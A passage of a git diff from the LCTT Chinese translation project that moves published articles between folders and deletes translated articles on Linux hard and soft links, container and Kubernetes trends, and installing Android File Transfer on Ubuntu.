目录下文件的链接(或你的文件系统所在的位置)。 - -``` -[dboth@david temp]$ ln link2.file.txt /tmp/link3.file.txt -ln: failed to create hard link '/tmp/link3.file.txt' => 'link2.file.txt': -Invalid cross-device link -``` - -为什么会出现这个错误呢? 原因是每一个单独的可挂载文件系统都有一套自己的 inode 号。简单的通过 inode 号来跨越整个 Linux 文件系统结构引用一个文件会使系统困惑,因为相同的节点号会存在于每个已挂载的文件系统中。 - -有时你可能会想找到一个 inode 的所有硬链接。你可以使用 `ls -li` 命令。然后使用 `find` 命令找到所有硬链接的节点号。 - -``` -[dboth@david temp]$ find . -inum 657024 -./main.file.txt -./link1.file.txt -./link2.file.txt -``` - -注意 `find` 命令不能找到所属该节点的四个硬链接,因为我们在 `~/temp` 目录中查找。 `find` 命令仅在当前工作目录及其子目录中查找文件。要找到所有的硬链接,我们可以使用下列命令,指定你的主目录作为起始查找条件。 - -``` -[dboth@david temp]$ find ~ -samefile main.file.txt -/home/dboth/temp/main.file.txt -/home/dboth/temp/link1.file.txt -/home/dboth/temp/link2.file.txt -/home/dboth/main.file.txt -``` - -如果你是非超级用户,没有权限,可能会看到错误信息。这个命令也使用了 `-samefile` 选项而不是指定文件的节点号。这个效果和使用 inode 号一样且更容易,如果你知道其中一个硬链接名称的话。 - -#### 对软链接进行实验 - -如你刚才看到的,不能跨越文件系统边界创建硬链接,即在逻辑卷或文件系统中从一个文件系统到另一个文件系统。软链接给出了这个问题的解决方案。虽然它们可以达到相同的目的,但它们是非常不同的,知道这些差异是很重要的。 - -让我们在 `~/temp` 目录中创建一个符号链接来开始我们的探索。 - -``` -[dboth@david temp]$ ln -s link2.file.txt link3.file.txt ; ls -li -total 12 -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link1.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 link2.file.txt -658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> -link2.file.txt -657024 -rw-rw-r-- 4 dboth dboth 1157 Jun 14 14:14 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -拥有节点号 `657024` 的那些硬链接没有变化,且硬链接的数目也没有变化。新创建的符号链接有不同的 inode 号 `658270`。 名为 `link3.file.txt` 的软链接指向了 `link2.file.txt` 文件。使用 `cat` 命令查看 `link3.file.txt` 文件的内容。符号链接的 inode 信息以字母 `l` (小写字母 l)开头,意味着这个文件实际是个符号链接。 - -上例中软链接文件 `link3.file.txt` 的大小只有 14 字节。这是文本内容 `link3.file.txt` 的大小,即该目录项的实际内容。目录项 `link3.file.txt` 并不指向一个 inode ;它指向了另一个目录项,这在跨越文件系统建立链接时很有帮助。现在试着创建一个软链接,之前在 `/tmp` 目录中尝试过的。 - -``` -[dboth@david temp]$ ln -s /home/dboth/temp/link2.file.txt -/tmp/link3.file.txt ; ls -l /tmp/link* -lrwxrwxrwx 1 dboth dboth 31 Jun 14 21:53 /tmp/link3.file.txt -> -/home/dboth/temp/link2.file.txt -``` - -#### 删除链接 - -当你删除硬链接或硬链接所指的文件时,需要考虑一些问题。 - -首先,让我们删除硬链接文件 `main.file.txt`。注意指向 inode 的每个目录项就是一个硬链接。 - -``` -[dboth@david temp]$ rm main.file.txt ; ls -li -total 8 -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link2.file.txt -658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> -link2.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -`main.file.txt` 是该文件被创建时所创建的第一个硬链接。现在删除它,仍然保留着原始文件和硬盘上的数据以及所有剩余的硬链接。要删除原始文件,你必须删除它的所有硬链接。 - -现在删除 `link2.file.txt` 硬链接文件。 - -``` -[dboth@david temp]$ rm link2.file.txt ; ls -li -total 8 -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 link1.file.txt -658270 lrwxrwxrwx 1 dboth dboth 14 Jun 14 15:21 link3.file.txt -> -link2.file.txt -657024 -rw-rw-r-- 3 dboth dboth 1157 Jun 14 14:14 main.file.txt -657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file -``` - -注意软链接的变化。删除软链接所指的硬链接会使该软链接失效。在我的系统中,断开的链接用颜色高亮显示,目标的硬链接会闪烁显示。如果需要修复这个损坏的软链接,你需要在同一目录下建立一个和旧链接相同名字的硬链接,只要不是所有硬链接都已删除就行。您还可以重新创建链接本身,链接保持相同的名称,但指向剩余的硬链接中的一个。当然如果软链接不再需要,可以使用 `rm` 命令删除它们。 - -`unlink` 命令在删除文件和链接时也有用。它非常简单且没有选项,就像 `rm` 命令一样。然而,它更准确地反映了删除的基本过程,因为它删除了目录项与被删除文件的链接。 - -### 写在最后 - -我用过这两种类型的链接很长一段时间后,我开始了解它们的能力和特质。我为我所教的 Linux 课程编写了一个实验室项目,以充分理解链接是如何工作的,并且我希望增进你的理解。 - --------------------------------------------------------------------------------- - -作者简介: - -戴维.布斯 - 戴维.布斯是 Linux 和开源倡导者,居住在北卡罗莱纳的罗列 。他在 IT 行业工作了四十年,为 IBM 工作了 20 多年的 OS/2。在 IBM 时,他在 1981 年编写了最初的 IBM PC 的第一个培训课程。他为 RedHat 教授过 RHCE 班,并曾在 MCI Worldcom、思科和北卡罗莱纳州工作。他已经用 Linux 和开源软件工作将近 20 年了。 - ---------------------------------- - -via: https://opensource.com/article/17/6/linking-linux-filesystem - -作者:[David Both][a] -译者:[yongshouzhang](https://github.com/yongshouzhang) -校对:[wxy](https://github.com/wxy) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/dboth -[1]:https://opensource.com/resources/what-is-linux?src=linux_resource_menu -[2]:https://opensource.com/resources/what-are-linux-containers?src=linux_resource_menu -[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=7016000000127cYAAQ -[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?src=linux_resource_menu&intcmp=7016000000127cYAAQ -[5]:https://opensource.com/tags/linux?src=linux_resource_menu -[6]:https://opensource.com/article/17/6/linking-linux-filesystem?rate=YebHxA-zgNopDQKKOyX3_r25hGvnZms_33sYBUq-SMM -[7]:https://opensource.com/user/14106/feed -[8]:https://www.flickr.com/photos/digypho/7905320090 -[9]:https://creativecommons.org/licenses/by/2.0/ -[10]:https://linux.cn/article-8685-1.html -[11]:https://linux.cn/article-8099-1.html -[12]:https://linux.cn/article-8887-1.html -[13]:https://opensource.com/business/16/9/linux-users-guide-lvm -[14]:https://opensource.com/life/15/9/everything-is-a-file -[15]:https://linux.cn/article-8685-1.html -[16]:https://linux.cn/article-8685-1.html#3_19182 -[17]:https://opensource.com/users/dboth -[18]:https://opensource.com/article/17/6/linking-linux-filesystem#comments diff --git a/published/201711/20170706 Wildcard Certificates Coming January 2018.md b/published/20170706 Wildcard Certificates Coming January 2018.md similarity index 100% rename from published/201711/20170706 Wildcard Certificates Coming January 2018.md rename to published/20170706 Wildcard Certificates Coming January 2018.md diff --git a/published/201711/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md b/published/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md similarity index 100% rename from published/201711/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md rename to published/20170825 Guide to Linux App Is a Handy Tool for Every Level of Linux User.md diff --git a/published/201711/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md b/published/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md similarity index 100% rename from published/201711/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md rename to published/20170905 GIVE AWAY YOUR CODE BUT NEVER YOUR TIME.md diff --git a/published/201711/20170928 3 Python web scrapers and crawlers.md b/published/20170928 3 Python web scrapers and crawlers.md similarity index 100% rename from published/201711/20170928 3 Python web scrapers and crawlers.md rename to published/20170928 3 Python web scrapers and crawlers.md diff --git a/published/201711/20171002 Scaling the GitLab database.md b/published/20171002 Scaling the GitLab database.md similarity index 100% rename from published/201711/20171002 Scaling the GitLab database.md rename to published/20171002 Scaling the GitLab database.md diff --git a/published/201711/20171003 PostgreSQL Hash Indexes Are Now Cool.md b/published/20171003 PostgreSQL Hash Indexes Are Now Cool.md similarity index 100% rename from published/201711/20171003 PostgreSQL Hash Indexes Are Now Cool.md rename to published/20171003 PostgreSQL Hash Indexes Are Now Cool.md diff --git a/published/201711/20171004 No the Linux desktop hasnt jumped in popularity.md b/published/20171004 No the Linux desktop hasnt jumped in popularity.md similarity index 100% rename from published/201711/20171004 No the Linux desktop hasnt jumped in popularity.md rename to published/20171004 No the Linux desktop hasnt jumped in popularity.md diff --git a/published/201711/20171007 Instant 100 command line productivity boost.md b/published/20171007 Instant 100 command line productivity boost.md similarity index 100% rename from published/201711/20171007 Instant 100 command line productivity boost.md rename to published/20171007 Instant 100 command line productivity boost.md diff --git a/published/201711/20171008 8 best languages to blog about.md b/published/20171008 8 best languages to blog about.md similarity index 100% rename from published/201711/20171008 8 best languages to blog about.md rename to published/20171008 8 best languages to blog about.md diff --git a/published/201711/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md b/published/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md similarity index 100% rename from published/201711/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md rename to published/20171009 CyberShaolin Teaching the Next Generation of Cybersecurity Experts.md diff --git a/published/201711/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md b/published/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md similarity index 100% rename from published/201711/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md rename to published/20171010 Getting Started Analyzing Twitter Data in Apache Kafka through KSQL.md diff --git a/published/201711/20171011 How to set up a Postgres database on a Raspberry Pi.md b/published/20171011 How to set up a Postgres database on a Raspberry Pi.md similarity index 100% rename from published/201711/20171011 How to set up a Postgres database on a Raspberry Pi.md rename to published/20171011 How to set up a Postgres database on a Raspberry Pi.md diff --git a/published/201711/20171011 Why Linux Works.md b/published/20171011 Why Linux Works.md similarity index 100% rename from published/201711/20171011 Why Linux Works.md rename to published/20171011 Why Linux Works.md diff --git a/published/201711/20171013 6 reasons open source is good for business.md b/published/20171013 6 reasons open source is good for business.md similarity index 100% rename from published/201711/20171013 6 reasons open source is good for business.md rename to published/20171013 6 reasons open source is good for business.md diff --git a/published/201711/20171013 Best of PostgreSQL 10 for the DBA.md b/published/20171013 Best of PostgreSQL 10 for the DBA.md similarity index 100% rename from published/201711/20171013 Best of PostgreSQL 10 for the DBA.md rename to published/20171013 Best of PostgreSQL 10 for the DBA.md diff --git a/published/201711/20171015 How to implement cloud-native computing with Kubernetes.md b/published/20171015 How to implement cloud-native computing with Kubernetes.md similarity index 100% rename from published/201711/20171015 How to implement cloud-native computing with Kubernetes.md rename to published/20171015 How to implement cloud-native computing with Kubernetes.md diff --git a/published/201711/20171015 Monitoring Slow SQL Queries via Slack.md b/published/20171015 Monitoring Slow SQL Queries via Slack.md similarity index 100% rename from published/201711/20171015 Monitoring Slow SQL Queries via Slack.md rename to published/20171015 Monitoring Slow SQL Queries via Slack.md diff --git a/published/201711/20171015 Why Use Docker with R A DevOps Perspective.md b/published/20171015 Why Use Docker with R A DevOps Perspective.md similarity index 100% rename from published/201711/20171015 Why Use Docker with R A DevOps Perspective.md rename to published/20171015 Why Use Docker with R A DevOps Perspective.md diff --git a/published/201711/20171016 Introducing CRI-O 1.0.md b/published/20171016 Introducing CRI-O 1.0.md similarity index 100% rename from published/201711/20171016 Introducing CRI-O 1.0.md rename to published/20171016 Introducing CRI-O 1.0.md diff --git a/published/201711/20171017 A tour of Postgres Index Types.md b/published/20171017 A tour of Postgres Index Types.md similarity index 100% rename from published/201711/20171017 A tour of Postgres Index Types.md rename to published/20171017 A tour of Postgres Index Types.md diff --git a/published/201711/20171017 Image Processing on Linux.md b/published/20171017 Image Processing on Linux.md similarity index 100% rename from published/201711/20171017 Image Processing on Linux.md rename to published/20171017 Image Processing on Linux.md diff --git a/published/201711/20171018 How containers and microservices change security.md b/published/20171018 How containers and microservices change security.md similarity index 100% rename from published/201711/20171018 How containers and microservices change security.md rename to published/20171018 How containers and microservices change security.md diff --git a/published/201711/20171018 Learn how to program in Python by building a simple dice game.md b/published/20171018 Learn how to program in Python by building a simple dice game.md similarity index 100% rename from published/201711/20171018 Learn how to program in Python by building a simple dice game.md rename to published/20171018 Learn how to program in Python by building a simple dice game.md diff --git a/published/201711/20171018 Tips to Secure Your Network in the Wake of KRACK.md b/published/20171018 Tips to Secure Your Network in the Wake of KRACK.md similarity index 100% rename from published/201711/20171018 Tips to Secure Your Network in the Wake of KRACK.md rename to published/20171018 Tips to Secure Your Network in the Wake of KRACK.md diff --git a/published/201711/20171019 3 Simple Excellent Linux Network Monitors.md b/published/20171019 3 Simple Excellent Linux Network Monitors.md similarity index 100% rename from published/201711/20171019 3 Simple Excellent Linux Network Monitors.md rename to published/20171019 3 Simple Excellent Linux Network Monitors.md diff --git a/published/201711/20171019 How to manage Docker containers in Kubernetes with Java.md b/published/20171019 How to manage Docker containers in Kubernetes with Java.md similarity index 100% rename from published/201711/20171019 How to manage Docker containers in Kubernetes with Java.md rename to published/20171019 How to manage Docker containers in Kubernetes with Java.md diff --git a/published/201711/20171020 3 Tools to Help You Remember Linux Commands.md b/published/20171020 3 Tools to Help You Remember Linux Commands.md similarity index 100% rename from published/201711/20171020 3 Tools to Help You Remember Linux Commands.md rename to published/20171020 3 Tools to Help You Remember Linux Commands.md diff --git a/published/201711/20171020 Running Android on Top of a Linux Graphics Stack.md b/published/20171020 Running Android on Top of a Linux Graphics Stack.md similarity index 100% rename from published/201711/20171020 Running Android on Top of a Linux Graphics Stack.md rename to published/20171020 Running Android on Top of a Linux Graphics Stack.md diff --git a/published/201711/20171024 Top 5 Linux pain points in 2017.md b/published/20171024 Top 5 Linux pain points in 2017.md similarity index 100% rename from published/201711/20171024 Top 5 Linux pain points in 2017.md rename to published/20171024 Top 5 Linux pain points in 2017.md diff --git a/published/201711/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md b/published/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md similarity index 100% rename from published/201711/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md rename to published/20171024 Who contributed the most to open source in 2017 Let s analyze GitHub’s data and find out.md diff --git a/published/201711/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md b/published/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md similarity index 100% rename from published/201711/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md rename to published/20171024 Why Did Ubuntu Drop Unity Mark Shuttleworth Explains.md diff --git a/published/201711/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md b/published/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md similarity index 100% rename from published/201711/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md rename to published/20171025 How to roll your own backup solution with BorgBackup, Rclone and Wasabi cloud storage.md diff --git a/published/201711/20171026 But I dont know what a container is .md b/published/20171026 But I dont know what a container is .md similarity index 100% rename from published/201711/20171026 But I dont know what a container is .md rename to published/20171026 But I dont know what a container is .md diff --git a/published/201711/20171026 Why is Kubernetes so popular.md b/published/20171026 Why is Kubernetes so popular.md similarity index 100% rename from published/201711/20171026 Why is Kubernetes so popular.md rename to published/20171026 Why is Kubernetes so popular.md diff --git a/published/201711/20171101 How to use cron in Linux.md b/published/20171101 How to use cron in Linux.md similarity index 100% rename from published/201711/20171101 How to use cron in Linux.md rename to published/20171101 How to use cron in Linux.md diff --git a/published/201711/20171101 We re switching to a DCO for source code contributions.md b/published/20171101 We re switching to a DCO for source code contributions.md similarity index 100% rename from published/201711/20171101 We re switching to a DCO for source code contributions.md rename to published/20171101 We re switching to a DCO for source code contributions.md diff --git a/published/201711/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md b/published/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md similarity index 100% rename from published/201711/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md rename to published/20171106 4 Tools to Manage EXT2 EXT3 and EXT4 Health in Linux.md diff --git a/published/201711/20171106 Finding Files with mlocate.md b/published/20171106 Finding Files with mlocate.md similarity index 100% rename from published/201711/20171106 Finding Files with mlocate.md rename to published/20171106 Finding Files with mlocate.md diff --git a/published/201711/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md b/published/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md similarity index 100% rename from published/201711/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md rename to published/20171106 Linux Foundation Publishes Enterprise Open Source Guides.md diff --git a/published/201711/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md b/published/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md similarity index 100% rename from published/201711/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md rename to published/20171106 Most companies can t buy an open source community clue. Here s how to do it right.md diff --git a/published/201711/20171107 AWS adopts home-brewed KVM as new hypervisor.md b/published/20171107 AWS adopts home-brewed KVM as new hypervisor.md similarity index 100% rename from published/201711/20171107 AWS adopts home-brewed KVM as new hypervisor.md rename to published/20171107 AWS adopts home-brewed KVM as new hypervisor.md diff --git a/published/201711/20171107 How I created my first RPM package in Fedora.md b/published/20171107 How I created my first RPM package in Fedora.md similarity index 100% rename from published/201711/20171107 How I created my first RPM package in Fedora.md rename to published/20171107 How I created my first RPM package in Fedora.md diff --git a/published/201711/20171108 Build and test applications with Ansible Container.md b/published/20171108 Build and test applications with Ansible Container.md similarity index 100% rename from published/201711/20171108 Build and test applications with Ansible Container.md rename to published/20171108 Build and test applications with Ansible Container.md diff --git a/published/201711/20171110 File better bugs with coredumpctl.md b/published/20171110 File better bugs with coredumpctl.md similarity index 100% rename from published/201711/20171110 File better bugs with coredumpctl.md rename to published/20171110 File better bugs with coredumpctl.md diff --git a/published/201711/20171114 ​Linux totally dominates supercomputers.md b/published/20171114 ​Linux totally dominates supercomputers.md similarity index 100% rename from published/201711/20171114 ​Linux totally dominates supercomputers.md rename to published/20171114 ​Linux totally dominates supercomputers.md diff --git a/published/201711/20171116 5 Coolest Linux Terminal Emulators.md b/published/20171116 5 Coolest Linux Terminal Emulators.md similarity index 100% rename from published/201711/20171116 5 Coolest Linux Terminal Emulators.md rename to published/20171116 5 Coolest Linux Terminal Emulators.md diff --git a/published/201711/20171117 How to Easily Remember Linux Commands.md b/published/20171117 How to Easily Remember Linux Commands.md similarity index 100% rename from published/201711/20171117 How to Easily Remember Linux Commands.md rename to published/20171117 How to Easily Remember Linux Commands.md diff --git a/published/201711/20171118 Getting started with OpenFaaS on minikube.md b/published/20171118 Getting started with OpenFaaS on minikube.md similarity index 100% rename from published/201711/20171118 Getting started with OpenFaaS on minikube.md rename to published/20171118 Getting started with OpenFaaS on minikube.md diff --git a/published/20171120 Containers and Kubernetes Whats next.md b/published/20171120 Containers and Kubernetes Whats next.md deleted file mode 100644 index 57f9379f7b..0000000000 --- a/published/20171120 Containers and Kubernetes Whats next.md +++ /dev/null @@ -1,81 +0,0 @@ -容器技术和 K8S 的下一站 -============================================================ -> 想知道容器编排管理和 K8S 的最新展望么?来看看专家怎么说。 - -![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") - -如果你想对容器在未来的发展方向有一个整体把握,那么你一定要跟着钱走,看看钱都投在了哪里。当然了,有很多很多的钱正在投入容器的进一步发展。相关研究预计 2020 年容器技术的投入将占有 [27 亿美元][4] 的市场份额。而在 2016 年,容器相关技术投入的总额为 7.62 亿美元,只有 2020 年投入预计的三分之一。巨额投入的背后是一些显而易见的基本因素,包括容器化的迅速增长以及并行化的大趋势。随着容器被大面积推广和使用,容器编排管理也会被理所当然的推广应用起来。 - -来自 [The new stack][5] 的调研数据表明,容器的推广使用是编排管理被推广的主要的催化剂。根据调研参与者的反馈数据,在已经将容器技术使用到生产环境中的使用者里,有六成使用者正在将 Kubernetes(K8S)编排管理广泛的应用在生产环境中,另外百分之十九的人员则表示他们已经处于部署 K8S 的初级阶段。在容器部署初期的使用者当中,虽然只有百分之五的人员表示已经在使用 K8S ,但是百分之五十八的人员表示他们正在计划和准备使用 K8S。总而言之,容器和 Kubernetes 的关系就好比是鸡和蛋一样,相辅相成紧密关联。众多专家一致认为编排管理工具对容器的[长周期管理][6] 以及其在市场中的发展有至关重要的作用。正如 [Cockroach 实验室][7] 的 Alex Robinson 所说,容器编排管理被更广泛的拓展和应用是一个总体的大趋势。毫无疑问,这是一个正在快速演变的领域,且未来潜力无穷。鉴于此,我们对 Robinson 和其他的一些容器的实际使用和推介者做了采访,来从他们作为容器技术的践行者的视角上展望一下容器编排以及 K8S 的下一步发展。 - -### 容器编排将被主流接受 - -像任何重要技术的转型一样,我们就像是处在一个高崖之上一般,在经过了初期步履蹒跚的跋涉之后将要来到一望无际的广袤平原。广大的新天地和平实真切的应用需求将会让这种新技术在主流应用中被迅速推广,尤其是在大企业环境中。正如 Alex Robinson 说的那样,容器技术的淘金阶段已经过去,早期的技术革新创新正在减速,随之而来的则是市场对容器技术的稳定性和可用性的强烈需求。这意味着未来我们将不会再见到大量的新的编排管理系统的涌现,而是会看到容器技术方面更多的安全解决方案,更丰富的管理工具,以及基于目前主流容器编排系统的更多的新特性。 - -### 更好的易用性 - -人们将在简化容器的部署方面下大功夫,因为容器部署的初期工作对很多公司和组织来说还是比较复杂的,尤其是容器的[长期管理维护][8]更是需要投入大量的精力。正如 [Codemill AB][9] 公司的 My Karlsson 所说,容器编排技术还是太复杂了,这导致很多使用者难以娴熟驾驭和充分利用容器编排的功能。很多容器技术的新用户都需要花费很多精力,走很多弯路,才能搭建小规模的或单个的以隔离方式运行的容器系统。这种现象在那些没有针对容器技术设计和优化的应用中更为明显。在简化容器编排管理方面有很多优化可以做,这些优化和改造将会使容器技术更加具有可用性。 - -### 在混合云以及多云技术方面会有更多侧重 - -随着容器和容器编排技术被越来越多的使用,更多的组织机构会选择扩展他们现有的容器技术的部署,从之前的把非重要系统部署在单一环境的使用情景逐渐过渡到更加[复杂的使用情景][10]。对很多公司来说,这意味着他们必须开始学会在 [混合云][11] 和 [多云][12] 的环境下,全局化的去管理那些容器化的应用和微服务。正如红帽 [Openshift 部门产品战略总监][14] [Brian Gracely][13] 所说,“容器和 K8S 技术的使用使得我们成功的实现了混合云以及应用的可移植性。结合 Open Service Broker API 的使用,越来越多的结合私有云和公有云资源的新应用将会涌现出来。” -据 [CloudBees][15] 公司的高级工程师 Carlos Sanchez 分析,联合服务(Federation)将会得到极大推动,使一些诸如多地区部署和多云部署等的备受期待的新特性成为可能。 - -**[ 想知道 CIO 们对混合云和多云的战略构想么? 请参看我们的这条相关资源, [Hybrid Cloud: The IT leader's guide][16]。 ]** - -### 平台和工具的持续整合及加强 - -对任何一种科技来说,持续的整合和加强从来都是大势所趋;容器编排管理技术在这方面也不例外。来自 [Sumo Logic][17] 的首席分析师 Ben Newton 表示,随着容器化渐成主流,软件工程师们正在很少数的一些技术上做持续整合加固的工作,来满足他们的一些微应用的需求。容器和 K8S 将会毫无疑问的成为容器编排管理方面的主流平台,并轻松碾压其它的一些小众平台方案。因为 K8S 提供了一个相当清晰的可以摆脱各种特有云生态的途径,K8S 将被大量公司使用,逐渐形成一个不依赖于某个特定云服务的“中立云”cloud-neutral。 - -### K8S 的下一站 - -来自 [Alcide][18] 的 CTO 和联合创始人 Gadi Naor 表示,K8S 将会是一个有长期和远景发展的技术,虽然我们的社区正在大力推广和发展 K8S,K8S 仍有很长的路要走。 - -专家们对[日益流行的 K8S 平台][19]也作出了以下一些预测: - -**_来自 Alcide 的 Gadi Naor 表示:_** “运营商会持续演进并趋于成熟,直到在 K8S 上运行的应用可以完全自治。利用 [OpenTracing][20] 和诸如 [istio][21] 技术的 service mesh 架构,在 K8S 上部署和监控微应用将会带来很多新的可能性。” - -**_来自 Red Hat 的 Brian Gracely 表示:_** “K8S 所支持的应用的种类越来越多。今后在 K8S 上,你不仅可以运行传统的应用程序,还可以运行原生的云应用、大数据应用以及 HPC 或者基于 GPU 运算的应用程序,这将为灵活的架构设计带来无限可能。” - -**_来自 Sumo Logic 的 Ben Newton 表示:_** “随着 K8S 成为一个具有统治地位的平台,我预计更多的操作机制将会被统一化,尤其是 K8S 将和第三方管理和监控平台融合起来。” - -**_来自 CloudBees 的 Carlos Sanchez 表示:_** “在不久的将来我们就能看到不依赖于 Docker 而使用其它运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [编辑提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” - -**_来自 Cockroach Labs 的 Alex Robinson 表示:_** “ K8S 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 K8S 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 K8S 平台内部以及在外部服务商一端做出的一些改进。” - -------------------------------------------------------------------------------- - -via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next - -作者:[Kevin Casey][a] -译者:[yunfengHe](https://github.com/yunfengHe) -校对:[wxy](https://github.com/wxy) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://enterprisersproject.com/user/kevin-casey -[1]:https://enterprisersproject.com/article/2017/11/kubernetes-numbers-10-compelling-stats -[2]:https://enterprisersproject.com/article/2017/11/how-enterprise-it-uses-kubernetes-tame-container-complexity -[3]:https://enterprisersproject.com/article/2017/11/5-kubernetes-success-tips-start-smart?sc_cid=70160000000h0aXAAQ -[4]:https://451research.com/images/Marketing/press_releases/Application-container-market-will-reach-2-7bn-in-2020_final_graphic.pdf -[5]:https://thenewstack.io/ -[6]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul -[7]:https://www.cockroachlabs.com/ -[8]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul -[9]:https://codemill.se/ -[10]:https://www.redhat.com/en/challenges/integration?intcmp=701f2000000tjyaAAA -[11]:https://enterprisersproject.com/hybrid-cloud -[12]:https://enterprisersproject.com/article/2017/7/multi-cloud-vs-hybrid-cloud-whats-difference -[13]:https://enterprisersproject.com/user/brian-gracely -[14]:https://www.redhat.com/en -[15]:https://www.cloudbees.com/ -[16]:https://enterprisersproject.com/hybrid-cloud?sc_cid=70160000000h0aXAAQ -[17]:https://www.sumologic.com/ -[18]:http://alcide.io/ -[19]:https://enterprisersproject.com/article/2017/10/how-explain-kubernetes-plain-english -[20]:http://opentracing.io/ -[21]:https://istio.io/ -[22]:http://cri-o.io/ -[23]:https://opensource.com/article/17/2/stateful-applications -[24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 -[25]:https://enterprisersproject.com/user/kevin-casey diff --git a/published/20171124 How to Install Android File Transfer for Linux.md b/published/20171124 How to Install Android File Transfer for Linux.md deleted file mode 100644 index 3cdb372c93..0000000000 --- a/published/20171124 How to Install Android File Transfer for Linux.md +++ /dev/null @@ -1,75 +0,0 @@ -如何在 Linux 下安装安卓文件传输助手 -=============== - -如果你尝试在 Ubuntu 下连接你的安卓手机,你也许可以试试 Linux 下的安卓文件传输助手。 - -本质上来说,这个应用是谷歌 macOS 版本的一个克隆。它是用 Qt 编写的,用户界面非常简洁,使得你能轻松在 Ubuntu 和安卓手机之间传输文件和文件夹。 - -现在,有可能一部分人想知道有什么是这个应用可以做,而 Nautilus(Ubuntu 默认的文件资源管理器)不能做的,答案是没有。 - -当我将我的 Nexus 5X(记得选择 [媒体传输协议 MTP][7] 选项)连接在 Ubuntu 上时,在 [GVfs][8](LCTT 译注: GNOME 桌面下的虚拟文件系统)的帮助下,我可以打开、浏览和管理我的手机,就像它是一个普通的 U 盘一样。 - -[![Nautilus MTP integration with a Nexus 5X](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/browsing-android-mtp-nautilus.jpg)][9] - -但是*一些*用户在使用默认的文件管理器时,在 MTP 的某些功能上会出现问题:比如文件夹没有正确加载,创建新文件夹后此文件夹不存在,或者无法在媒体播放器中使用自己的手机。 - -这就是要为 Linux 系统用户设计一个安卓文件传输助手应用的原因,将这个应用当做将 MTP 设备安装在 Linux 下的另一种选择。如果你使用 Linux 下的默认应用时一切正常,你也许并不需要尝试使用它 (除非你真的很想尝试新鲜事物)。 - - -![Android File Transfer Linux App](http://www.omgubuntu.co.uk/wp-content/uploads/2017/11/android-file-transfer-for-linux-750x662.jpg) - -该 app 特点: - -*   简洁直观的用户界面 -*   支持文件拖放功能(从 Linux 系统到手机) -*   支持批量下载 (从手机到 Linux系统) -*   显示传输进程对话框 -*   FUSE 模块支持 -*   没有文件大小限制 -*   可选命令行工具 - -### Ubuntu 下安装安卓手机文件助手的步骤 - -以上就是对这个应用的介绍,下面是如何安装它的具体步骤。 - -这有一个 [PPA](个人软件包集)源为 Ubuntu 14.04 